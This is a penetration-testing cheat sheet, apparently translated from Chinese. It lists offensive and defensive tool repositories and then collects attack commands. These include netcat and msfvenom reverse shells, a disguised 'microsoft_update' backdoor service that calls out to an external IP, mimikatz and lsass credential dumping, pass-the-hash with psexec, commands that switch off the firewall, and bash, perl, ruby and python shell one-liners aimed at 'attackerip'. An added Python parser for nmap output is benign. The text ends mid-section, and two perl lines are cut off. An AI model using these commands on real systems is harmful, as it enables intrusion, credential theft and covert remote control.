Getting Started
https://wizardforcel.gitbooks.io/web-hacking-101/content/ (Web Hacking 101, Chinese version)
https://wizardforcel.gitbooks.io/asani/content/ (Android Security Made Easy, Chinese version)
https://wizardforcel.gitbooks.io/lpad/content/ (Android penetration testing study manual, Chinese version)
https://wizardforcel.gitbooks.io/kali-linux-web-pentest-cookbook/content/ (Kali Linux Web Penetration Testing Cookbook, Chinese version)
https://github.com/hardenedlinux/linux-exploit-development-tutorial (Linux exploit development primer)
https://www.gitbook.com/book/t0data/burpsuite/details (Burp Suite practical guide)
http://www.kanxue.com/?article-read-1108.htm=&winzoom=1 (penetration testing Node.js applications)
https://github.com/qazbnm456/awesome-web-security (web security information and resource list)
https://sec-wiki.com/ (sec-wiki, a security wiki)

Fuzz tool collection
https://github.com/ivanfratric/winafl
https://github.com/attekett/NodeFuzz
https://github.com/google/oss-fuzz
http://blog.topsec.com.cn/ad_lab/alphafuzzer/
http://llvm.org/docs/LibFuzzer.html

Subdomain name enumeration
https://github.com/lijiejie/subDomainsBrute (classic subdomain brute-force enumeration script)
https://github.com/ring04h/wydomain (subdomain dictionary enumeration)
https://github.com/le4f/dnsmaper (subdomain enumeration and map marking)
https://github.com/0xbug/orangescan (online subdomain information collection tool)
https://github.com/TheRook/subbrute (query subdomains based on DNS records)
https://github.com/We5ter/GSDF (subdomain query script based on Google SSL certificate transparency)
https://github.com/mandatoryprogrammer/cloudflare_enum (script for subdomain enumeration using CloudFlare)
https://github.com/18F/domain-scan (a domain scanner)
https://github.com/guelfoweb/knock (Knock subdomain scan)
https://github.com/Evi1CLAY/CoolPool/tree/master/Python/DomainSeeker (collects target subdomain information in multiple ways)
https://github.com/code-scan/BroDomain (sibling domain lookup)
https://github.com/chuhades/dnsbrute (subdomain enumeration based on DNS queries)

Web application scanner
http://github.com/Arachni/arachni (web application security scanner framework, http://www.arachni-scanner.com)

Database scan, injection tool
https://github.com/sqlmapproject/sqlmap (sqlmap, the king of injection tools)
https://github.com/0xbug/SQLiScanner (passive SQL injection vulnerability scanner based on SQLMAP and Charles)
https://github.com/stamparm/DSSS (SQL injection vulnerability scanner in 99 lines of code)
https://github.com/youngyangyang04/NoSQLAttack (an attack tool for MongoDB)
https://github.com/Neohapsis/bbqsql (blind SQL injection exploitation framework)
https://github.com/NetSPI/PowerUpSQL (PowerShell scripting framework for attacking SQL Server)
https://github.com/WhitewidowScanner/whitewidow (another database scanner)
https://github.com/stampery/mongoaudit (MongoDB auditing and penetration testing tool)
https://github.com/commixproject/commix (command injection exploitation tool)

Weak password or information leak scan
https://github.com/lijiejie/htpwdScan (a simple HTTP brute-force and credential-stuffing script)
https://github.com/lijiejie/BBScan (a lightweight information-leak scanning script)
https://github.com/lijiejie/GitHack (.git folder leak exploitation tool)
https://github.com/LoRexxar/BScanner (small dictionary-based directory scanner)
https://github.com/she11c0der/fenghuangscanner_v3 (scans various ports and weak passwords; author wilson9x1, original address expired)
https://github.com/ysrc/F-Scrack (weak password detection script for various services)
https://github.com/Mebus/cupp (generates a weak-password dictionary according to user habits)
https://github.com/RicterZ/genpAss (Chinese weak password generator)
https://github.com/netxfly/crack_ssh (ssh/redis/mongodb weak password cracking tool written in Go)
https://github.com/n0tr00t/Sreg (returns all internet account information registered by a user, given an e-mail, phone number or username)
https://github.com/repoog/GitPrey (GitHub sensitive information scanning tool)
https://github.com/dxa4481/truffleHog (GitHub sensitive information scanning tool, including commit history)
https://github.com/LandGrey/pydictor (brute-force dictionary builder)
https://github.com/GDSSecurity/xxe-recursive-download (XXE recursive download tool)
https://buer.haus/xxegen/ (XXE online generation utility)

Internet of Things device scan
https://github.com/rapid7/IoTSeeker (IoT device default password detection tool)
https://github.com/shodan-labs/iotdb (uses nmap to scan IoT devices)
https://github.com/jh00nbr/Routerhunter-2.0 (router exploitation tool)
https://github.com/reverse-shell/routersploit (router exploitation framework)
https://github.com/scu-igroup/telnet-scanner (telnet service credential-stuffing checker)
https://github.com/RUB-NDS/PRET (printer attack framework)

XSS scan
https://github.com/shawarkhanethicalhacker/BruteXSS (cross-site scripting bruteforcer)
https://github.com/1N3/XSSTracer (a small Python script to check for cross-site tracing)
https://github.com/0x584A/fuzzXssPHP (reflected XSS scanner, PHP version)
https://github.com/chuhades/xss_scan (batch XSS scanning Python script)
https://github.com/BlackHole1/autoFindXssAndCsrf (browser plug-in that automatically detects XSS and CSRF vulnerabilities)

Corporate network self-test
https://github.com/sowish/LNScan (detailed internal network information scanner)
https://github.com/SkyLined/LocalNetworkScanner (local network scanner implemented in JavaScript)
https://github.com/ysrc/xunfeng (web asset recognition engine and vulnerability detection engine)
https://github.com/laramies/theHarvester (monitors search engines for an enterprise's indexed sensitive assets: employee e-mails, subdomains, hosts)
https://github.com/x0day/Multisearch-v2 (search engine aggregated search; can be used to find an enterprise's sensitive assets indexed by search engines)

Webshell detection and virus analysis tools
https://github.com/We5ter/Scanners-Box/tree/master/webshell/ (simple PHP backdoor detection tool and webshell repository)
https://github.com/ym2011/ScanBackdoor (webshell scanning tool)
https://github.com/yassineaddi/BackdoorMan (PHP backdoor scanning)
https://github.com/he1m4n6a/findWebshell (another webshell detection tool)
https://github.com/Tencent/HaboMalHunter (Habo analysis system: Linux virus analysis and security inspection)
https://github.com/PlagueScanner/PlagueScanner (integrates the ClamAV, ESET and Bitdefender anti-virus engines; implemented in Python)
https://github.com/nbs-system/php-malware-finder (a high-efficiency PHP webshell scanning tool)
https://github.com/emposha/PHP-Shell-Detector/ (webshell detection tool; claims up to 99% detection rate)

Intranet security penetration test tool set
https://github.com/0xwindows/VulScritp (intranet penetration scripts, including banner scans, port scans, various general exploits, etc.)
https://github.com/lcatro/network_backdoor_scanner (intranet detection framework based on network traffic)
https://github.com/fdiskyou/hunter (calls the Windows API to enumerate user login information)
https://github.com/BlackHole1/WebRtcXSS (automated XSS pivot into the intranet)
https://github.com/AlessandroZ/LaZagne (local stored-password extraction tool)
https://github.com/huntergregal/mimipenguin (Linux credential dumping tool)

Port scanning, fingerprinting, and middleware scanning
https://nmap.org/download.html (Nmap, the king of port scanners; source at https://svn.nmap.org/)
https://github.com/ring04h/wyportmap (target port scanning + system service fingerprinting)
https://github.com/ring04h/weakfilescan (dynamic multithreaded sensitive information leak detection tool)
https://github.com/EnableSecurity/wafw00f (WAF product fingerprinting)
https://github.com/rbsec/sslscan (SSL type identification)
https://github.com/urbanadventurer/whatweb (web fingerprinting)
https://github.com/tanjiti/FingerPrint (web application fingerprinting)
https://github.com/nanshihui/Scan-T (web crawler fingerprint recognition)
https://github.com/OffensivePython/Nscan (a fast network scanner inspired by Masscan and Zmap)
https://github.com/ywolf/F-NAScan (network asset information scanning: ICMP liveness detection, port scanning, port fingerprinting, service identification)
https://github.com/ywolf/F-MiddlewareScan (middleware scanning)
https://github.com/maurosoria/dirsearch (web path scanner)
https://github.com/x0day/bannerscan (C-class (/24) range banner and path scan)
https://github.com/RASSec/RASscan (port service scan)
https://github.com/3xp10it/bypass_waf (automated WAF bypass)
https://github.com/3xp10it/xcdn (tries to find the real IP behind a CDN)
https://github.com/Xyntax/BingC (C-class range / same-server site lookup based on the Bing search engine; multithreaded, API supported)
https://github.com/Xyntax/DirBrute (multithreaded web directory brute-force tool)
https://github.com/zer0h/httpscan (a crawler-style web host discovery tool)
https://github.com/lietdai/doom (distributed IP/port vulnerability scanner built on Thorn)
https://github.com/chichou/grab.js (a fast TCP fingerprint parsing tool similar to zgrab; supports more protocols)
https://github.com/Nitr4x/whichCDN (CDN identification and detection)
https://github.com/secfree/bcrpscan (crawler-based web path scanner)

Targeted vulnerability testing tools
https://github.com/brianwrf/hackUtils (Java deserialization exploitation tool set)
https://github.com/frohoff/ysoserial (Java deserialization exploitation tool)
https://github.com/blackye/Jenkins (Jenkins vulnerability detection, user enumeration and brute force)
https://github.com/code-scan/dzscan (Discuz! vulnerability scanner)
https://github.com/chuhades/CMS-Exploit-Framework (CMS attack framework)
https://github.com/lijiejie/IIS_shortname_Scanner (IIS short file name vulnerability scanner)
https://github.com/riusksk/FlashScanner (Flash XSS scanner)
https://github.com/coffeehb/SSTIF (semi-automated tool for server-side template injection vulnerabilities)
https://github.com/epinna/tplmap (server-side template injection detection and exploitation tool)
https://github.com/cr0hn/dockerscan (Docker scanning tool)
https://github.com/GoSecure/break-fast-serial (uses DNS resolution to detect Java deserialization vulnerabilities)
https://github.com/dirtycow/dirtycow.github.io (Dirty COW privilege escalation exploit)

Wireless network penetration, scanning
https://github.com/savio-code/fern-wifi-cracker/ (wireless security audit tool)
https://github.com/m4n3dw0lf/PytheM (Python network/penetration testing tool)
https://github.com/P0cL4bs/WiFi-Pumpkin (wireless security penetration test suite)

Code static scan, code run stack trace
https://github.com/exakat/php-static-analysis-tools (PHP static scanning toolset)
https://github.com/wufeifei/cobra (white-box code security auditing system)
https://github.com/OneSourceCat/phpvulhunter (static PHP code auditing)
https://github.com/Qihoo360/phptrace (tool to trace and analyze the performance of PHP)
https://github.com/ajinabraham/NodeJsScan (Node.js application code audit)
https://github.com/pwnsdx/BadCode (PHP code auditing)
https://github.com/thesp0nge/dawnscanner (Ruby source audit)
https://github.com/presidentbeef/brakeman (security vulnerability scanner for Ruby on Rails applications)
https://github.com/ajinabraham/Mobile-Security-Framework-MobSF/ (app black-box audit)
https://github.com/alibaba/iOSSecAudit (iOS security audit)

Modular scan, integrated scanner
https://github.com/az0ne/AZScanner (automatic vulnerability scanner: subdomain brute force, port scanning, directory brute force, common framework vulnerability detection)
https://github.com/blackye/lalascan (distributed web vulnerability scanning framework, combining OWASP Top 10 vulnerability scanning and boundary asset discovery)
https://github.com/blackye/BkScanner (BkScanner distributed, plug-in web vulnerability scanner)
https://github.com/ysrc/GourdScanV2 (passive vulnerability scanning)
https://github.com/alpha1e0/pentestdb (web penetration test database)
https://github.com/netxfly/passive_scan (web proxy based web vulnerability scanner)
https://github.com/1N3/Sn1per (automated scanner, including middleware scanning and device fingerprinting)
https://github.com/RASSec/pentestEr_Fully-automatic-scanner (targeted fully automated penetration testing tool)
https://github.com/3xp10it/3xp10it (automated penetration testing framework)
https://github.com/Lcys/lcyscan (scan results are not verified)
https://github.com/Xyntax/POC-T (penetration test plug-in concurrency framework)
https://github.com/v3n0m-Scanner/V3n0M-Scanner (scanner in Python 3.5 for SQLi/XSS/LFI/RFI and other vulns)
https://github.com/Skycrab/leakScan (web-side online vulnerability scanning)
https://github.com/zhangzhenfeng/AnyScan (under development...)

Android series tools:
http://sec-redclub.com/index.php/archives/439/

DDOS protection:
https://github.com/ywjt/Dshield

Database firewall:
https://nim4.github.io/DBShield/

WAF open source and rules:
https://github.com/xsec-lab/x-waf
https://github.com/loveshell/ngx_lua_waf
https://github.com/SpiderLabs/owasp-modsecurity-crs/tree/master/base_rules

Penetration test tool practical skills collection
The best NMAP scanning strategy

```
$ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24
$ grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' ' > LiveHosts.txt

$ nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt
$ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt
$ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt

$ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt
$ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt

$ grep "open" FullTCP | cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' | xargs | sed 's/ /,/g' | awk '{print "T:"$0}'
$ grep "open" FullUDP | cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' | xargs | sed 's/ /,/g' | awk '{print "U:"$0}'

$ nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt
$ nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt
```
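Added example, not part of the original page: a Python parser for the grepable (-oG) files the commands above write. It reproduces the grep/cut live-host step and the sort/xargs/sed/awk port-list step in code, and also keeps the service and version columns that the pipelines throw away; the sample scan output is constructed.

```python
from collections import defaultdict

# Constructed sample in the grepable (-oG) format that Discovery.gnmap, TopTCP
# and 3674 above are written in.  Not real scan output.
SAMPLE_GNMAP = """\
# Nmap 7.80 scan initiated as: nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt
Host: 192.168.56.1 ()\tStatus: Up
Host: 192.168.56.101 ()\tStatus: Up
Host: 192.168.56.101 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.9p1/, 80/open/tcp//http//Apache httpd 2.4.38/, 139/filtered/tcp//netbios-ssn///, 53/open/udp//domain//ISC BIND 9.11/\tIgnored State: closed (996)
Host: 192.168.56.102 ()\tStatus: Up
Host: 192.168.56.102 ()\tPorts: 445/open/tcp//microsoft-ds///\tIgnored State: closed (999)
# Nmap done -- 3 IP addresses (3 hosts up) scanned
"""


def live_hosts(gnmap_text):
    """Same result as: grep "Status: Up" file | cut -f 2 -d ' '"""
    return [line.split()[1] for line in gnmap_text.splitlines()
            if line.startswith("Host:") and "Status: Up" in line]


def open_ports(gnmap_text):
    """Map each host to its open ports as (port, proto, service, version) tuples.

    Each port entry has the fixed layout port/state/proto/owner/service/rpc/version/;
    nmap replaces '/' inside version strings with '|', so splitting on '/' is safe.
    """
    result = defaultdict(list)
    for line in gnmap_text.splitlines():
        if not line.startswith("Host:"):
            continue
        fields = line.split("\t")          # tab separates the Host/Ports/Ignored columns
        host = fields[0].split()[1]
        for field in fields[1:]:
            if not field.startswith("Ports:"):
                continue
            for entry in field[len("Ports:"):].split(","):
                parts = entry.strip().split("/")
                if len(parts) < 7 or parts[1] != "open":
                    continue               # skip closed/filtered and malformed entries
                result[host].append((int(parts[0]), parts[2], parts[4], parts[6]))
    return dict(result)


def port_spec(gnmap_text):
    """Build the 'T:22,80,U:53' list the sort|xargs|sed|awk pipelines above produce,
    in the syntax nmap -p accepts for a follow-up targeted scan."""
    tcp, udp = set(), set()
    for entries in open_ports(gnmap_text).values():
        for port, proto, _service, _version in entries:
            (tcp if proto == "tcp" else udp).add(port)
    spec = []
    if tcp:
        spec.append("T:" + ",".join(str(p) for p in sorted(tcp)))
    if udp:
        spec.append("U:" + ",".join(str(p) for p in sorted(udp)))
    return ",".join(spec)


if __name__ == "__main__":
    print(live_hosts(SAMPLE_GNMAP))
    for host, ports in open_ports(SAMPLE_GNMAP).items():
        print(host, ports)
    print(port_spec(SAMPLE_GNMAP))
```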
```
$ nmap -O -sV -T4 -Pn -p U:53,111,137,T:21-25,80,139,8080 -oG OS_Service_Detect -iL LiveHosts.txt
```

Nmap - Dodge the firewall

```
$ nmap -f
$ nmap --mtu 24
$ nmap -D RND:10 [target]
$ nmap -D decoy1,decoy2,decoy3 etc.
$ nmap -sI [Zombie IP] [Target IP]
$ nmap --source-port 80 IP
$ nmap --data-length 25 IP
$ nmap --spoof-mac Dell/Apple/3Com IP
```

Nmap for Web Vulnerability Scanning
```
cd /usr/share/nmap/scripts/
wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz
nmap -sS -sV --script=vulscan/vulscan.nse target
nmap -sS -sV --script=vulscan/vulscan.nse --script-args vulscandb=scipvuldb.csv target
nmap -sS -sV --script=vulscan/vulscan.nse --script-args vulscandb=scipvuldb.csv -p80 target
nmap -PN -sS -sV --script=vulscan --script-args vulscancorrelation=1 -p80 target
nmap -sV --script=vuln target
nmap -PN -sS -sV --script=all --script-args vulscancorrelation=1 target
```

Use DIRB to brute-force directories

Note: DIRB is a tool dedicated to brute-forcing directories. It is installed by default in Kali. Similar tools include Patator, dirsearch, DirBuster, and Yujian (御剑) from China.

```
dirb http://IP:PORT /usr/share/dirb/wordlists/common.txt
```

Patator - all-round brute-force tool
```
git clone https://github.com/lanjelot/patator.git /usr/share/patator

$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst
$ patator smtp_login host=192.168.17.129 user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
$ patator smtp_login host=192.168.17.129 helo='ehlo 192.168.17.128' user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst -x ignore:fgrep='incorrect password or account name'
```

Use Fierce to brute-force DNS
Note: Fierce checks whether the DNS server allows zone transfers. If it does, a zone transfer is performed and the user is notified. If not, host names can be enumerated by querying the DNS server. Similar tools: subDomainsBrute, SubBrute, and so on.
```
$ ./fierce.pl -dns example.com
$ ./fierce.pl -dns example.com -wordlist myWordList.txt
```

Use Nikto to scan web services

```
nikto -C all -h http://IP
```

Scan WordPress

```
git clone https://github.com/wpscanteam/wpscan.git && cd wpscan
./wpscan --url http://IP/ --enumerate p
```

HTTP fingerprinting

```
wget http://www.net-square.com/_assets/httprint_linux_301.zip && unzip httprint_linux_301.zip
cd httprint_301/linux/
./httprint -h http://IP -s signatures.txt
```

Scan using Skipfish
Note: Skipfish is a web application security reconnaissance tool. It uses a recursive crawler and dictionary-based probes to generate an interactive site map, which is then annotated with the results of its active security checks.

```
skipfish -m 5 -LY -S /usr/share/skipfish/dictionaries/complete.wl -o ./skipfish2 -u http://IP
```

Use NC to scan

```
nc -v -w 1 target -z 1-1000
for i in {101..102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done
```

Unicornscan
Note: Unicornscan is a tool for information collection and security auditing.

```
us -H -msf -Iv 192.168.56.101 -p 1-65535
us -H -mU -Iv 192.168.56.101 -p 1-65535
```

-H: resolve host names during the report generation phase
-m: scan type (sf = TCP, U = UDP)
-Iv: verbose

Use Xprobe2 to identify the operating system fingerprint
```
xprobe2 -v -p tcp:80:open IP
```

Enumerate Samba

```
nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target
```

Enumerate SNMP

```
snmpget -v 1 -c public IP
snmpwalk -v 1 -c public IP
snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP
```

Practical Windows cmd commands
```
net localgroup Users
net localgroup Administrators
dir /s *.doc
system("start cmd.exe /k $cmd")
sc create microsoft_update binpath="cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe" start= auto error= ignore
/c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp      (32-bit system)
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp  (64-bit system)
```

PuTTY connection tunnel

Forward a remote port to the target address:

```
plink.exe -P 22 -l root -pw "1234" -R 445:127.0.0.1:445 IP
```

Meterpreter port forwarding

```
meterpreter > portfwd add -l 3389 -p 3389 -r 172.16.194.141
kali > rdesktop 127.0.0.1:3389
```

Turn on the RDP service

```
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
```

Turn off Windows Firewall

```
netsh firewall set opmode disable
```

Meterpreter VNC \ RDP

```
run getgui -u admin -p 1234
run vnc -p 5043
```

Use Mimikatz
Get Windows plaintext username and password

```
git clone https://github.com/gentilkiwi/mimikatz.git
privilege::debug
sekurlsa::logonPasswords full
```

Get a hash

```
git clone https://github.com/byt3bl33d3r/pth-toolkit
pth-winexe -U hash //IP cmd
```

or

```
apt-get install freerdp-x11
xfreerdp /u:offsec /d:win2012 /pth:HASH /v:IP
```

or

```
meterpreter > run post/windows/gather/hashdump
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
msf exploit(psexec) > exploit
meterpreter > shell
```

Use Hashcat to crack the password

```
hashcat -m 400 -a 0 hash /root/rockyou.txt
```

Use NC to fetch banner information
```
nc 192.168.0.10 80
GET / HTTP/1.1
Host: 192.168.0.10
User-Agent: Mozilla/4.0
Referer: www.example.com
```

Reverse shell on Windows using NC

```
c:>nc -Lp 31337 -vv -e cmd.exe
nc 192.168.0.10 31337
c:>nc example.com 80 -e cmd.exe
nc -lp 80
nc -lp 31337 -e /bin/bash
nc 192.168.0.10 31337
nc -vv -r(random) -w(wait) 1 192.168.0.10 -z(i/o error) 1-1000
```

Find SUID/SGID root files
```
find / -user root -perm -4000 -print
find / -group root -perm -2000 -print
find / -perm -4000 -o -perm -2000 -print
find / -nouser -print
find / -nogroup -print
find / -type l -ls
```

Python shell
```
python -c 'import pty;pty.spawn("/bin/bash")'
```

Python / Ruby / PHP HTTP server

```
python2 -m SimpleHTTPServer
python3 -m http.server
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start"
php -S 0.0.0.0:8888
```

Get the PID of the process on a port

```
fuser -nv tcp 80
fuser -k -n tcp 80
```

Brute-force RDP using Hydra

```
hydra -l admin -P /root/Desktop/passwords -S X.X.X.X rdp
```

Mount remote Windows shared folders

```
smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
```

Compile an exploit under Kali

```
gcc -m32 -o output32 hello.c   (32-bit)
gcc -m64 -o output hello.c     (64-bit)
```

Compile a Windows exploit under Kali

```
wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
wine mingw-get-setup.exe
select mingw32-base
cd /root/.wine/drive_c/windows
wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
wine ability.exe
```

NASM commands
Note: NASM, the Netwide Assembler, is an assembler for the 80x86 and x86-64 platforms. It was originally designed to be portable and modular.

```
nasm -f bin -o payload.bin payload.asm
nasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload
```

SSH pivoting
```
ssh -D 127.0.0.1:1080 -p 22 user@IP
```

Add `socks4 127.0.0.1 1080` to /etc/proxychains.conf, then:

```
proxychains commands target
```

SSH pivoting from one network to another

```
ssh -D 127.0.0.1:1080 -p 22 user1@IP1
```

Add `socks4 127.0.0.1 1080` to /etc/proxychains.conf, then:

```
proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2
```

Add `socks4 127.0.0.1 1081` to /etc/proxychains.conf, then:

```
proxychains commands target
```

Pivoting with Metasploit

```
route add X.X.X.X 255.255.255.0 1
use auxiliary/server/socks4a
run
proxychains msfcli windows/* PAYLOAD=windows/meterpreter/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E
```

or

```
meterpreter> ipconfig
IP Address : 10.1.13.3
meterpreter> run autoroute -s 10.1.13.0/24
meterpreter> run autoroute -p
10.1.13.0 255.255.255.0 Session 1
meterpreter> Ctrl + Z
msf auxiliary(tcp) > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 10.1.13.2
msf exploit(psexec) > exploit
meterpreter> ipconfig
IP Address : 10.1.13.2
```

Query Exploit-DB from the CSV file

```
git clone https://github.com/offensive-security/exploit-database.git
cd exploit-database
./searchsploit -u
./searchsploit apache 2.2
./searchsploit "Linux Kernel"
cat files.csv | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep "<|<=" | sort -k3
```

MSF payloads
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST= X > system.exe
msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=443 R > exploit.php
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -e -a x86 --platform win -f asp -o file.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -e x86/shikata_ga_nai -b "\x00" -a x86 --platform win -f c
```

MSF: generate a reverse Meterpreter shell for Linux

```
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=443 -e -f elf -a x86 --platform linux -o shell
```

MSF: generate a reverse shell (C shellcode)

```
msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b "\x00\x0a\x0d" -a x86 --platform win -f c
```

MSF: generate a reverse Python shell

```
msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py
```

MSF: generate a reverse ASP shell

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp -a x86 --platform win -o shell.asp
```

MSF: generate a reverse Bash shell

```
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -o shell.sh
```

MSF: generate a reverse PHP shell

```
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -o shell.php
```

Add `<?php` at the beginning:

```
perl -i~ -0777pe's/^/<?php \n/' shell.php
```

MSF: generate a reverse Windows shell

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -a x86 --platform win -o shell.exe
```

Linux common security commands
```
find / -uid 0 -perm -4000
find / -perm -o=w
find / -name " " -print
find / -name ".." -print
find / -name ". " -print
find / -name " " -print
find / -nouser
lsof +L1
lsof -i
arp -a
getent passwd
getent group
for user in $(getent passwd|cut -f1 -d:); do echo "### Crontabs for $user ####"; crontab -u $user -l; done
cat /dev/urandom | tr -dc 'a-zA-Z0-9-!@#$%^&*()+{}|:<>?=' | fold -w 12 | head -n 4
find . | xargs -I file lsattr -a file 2>/dev/null | grep '^....i'
chattr -i file
```

Windows buffer overflow exploit commands
```
msfvenom -p windows/shell_bind_tcp -a x86 --platform win -b "\x00" -f c
msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 -a x86 --platform win -e x86/shikata_ga_nai -b "\x00" -f c
```

Commonly used bad characters: \x00\x0a\x0d\x20
For HTTP requests: \x00\x0a\x0d\x20\x1a\x2c\x2e\x3a\x5c (ending with 0 \n \r _)

```
pattern create
pattern offset (EIP address)
pattern offset (ESP address)
```

Fill with garbage up to the EIP offset, put the JMP ESP address in EIP, and place the shellcode at ESP (ESP = shellcode).

```
!pvefindaddr pattern_create 5000
!pvefindaddr suggest
!pvefindaddr modules
!pvefindaddr nosafeseh

!mona config -set workingfolder C:\Mona%p
!mona config -get workingfolder
!mona mod
!mona bytearray -b "\x00\x0a"
!mona pc 5000
!mona po EIP
!mona suggest
```

SEH - Structured Exception Handling
Note: SEH (Structured Exception Handling) is the error and exception handling mechanism that the Windows operating system provides to programmers.
```
!mona suggest
!mona nosafeseh
nseh = "\ xeb6e5" x90 " (next seh chain)
iseh = !pvefindaddr p1 -n -o -i (POP POP RETN or POP r32, POP r32, RETN)
```

ROP (DEP)
Note: ROP (Return-Oriented Programming) is an exploitation technique that lets an attacker execute code in the presence of defenses such as non-executable memory and code signing.

DEP (Data Execution Prevention) is a set of hardware and software technologies that strictly separate code from data in memory, so that data cannot be executed as code.
```
!mona modules
!mona ropfunc -m *.dll -cpb "\x00\x09\x0a"
!mona rop -m *.dll -cpb "\x00\x09\x0a" (auto suggest)
```

ASLR - Address Space Layout Randomization

```
!mona noaslr
```

Egg hunting
Egg hunting is a technique that can be classified as "staged shellcode". It lets a small piece of specially crafted shellcode locate the actual (larger) shellcode, our "egg", by searching memory for it. In other words, a short stub is executed first, which then finds the real shellcode and executes it. See the Kanxue (看雪) forum for more details, via the links I added in the code comments.
```
!mona jmp -r esp
!mona egg -t lxxl
\xeb\xc4 (jump backward -60)
buff=lxxllxxl+shell
!mona egg -t 'w00t'
```

GDB debugger common commands

```
break *_start
next / step   (n / s)
continue      (c)
```

Checking registers and memory:

```
print /d  --> decimal
print /t  --> binary
print /x  --> hex
```

Output:

```
(gdb) print /d $eax
$17 = 13
(gdb) print /t $eax
$18 = 1101
(gdb) print /x
```

Examine memory: `x/nyz`, where n is the number of units to display, y the output format (c character, d decimal, x hexadecimal) and z the unit size (b byte, h halfword, w word, 32 bits).

Bash reverse shell
```
bash -i >& /dev/tcp/X.X.X.X/443 0>&1
exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/attackerip/4444
cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done
/bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1
/bin/bash -i > /dev/tcp/X.X.X.X/443 0<&1 2>&1
```

Perl reverse shell
```
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:443");STDIN->fdopen(
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen(
```

Ruby reverse shell

```
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
ruby -rsocket -e 'c=TCPSocket.new("attackerip","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
ruby -rsocket -e 'f=TCPSocket.open("attackerip","443").to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
```

Python reverse shell

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

PHP reverse shell

```
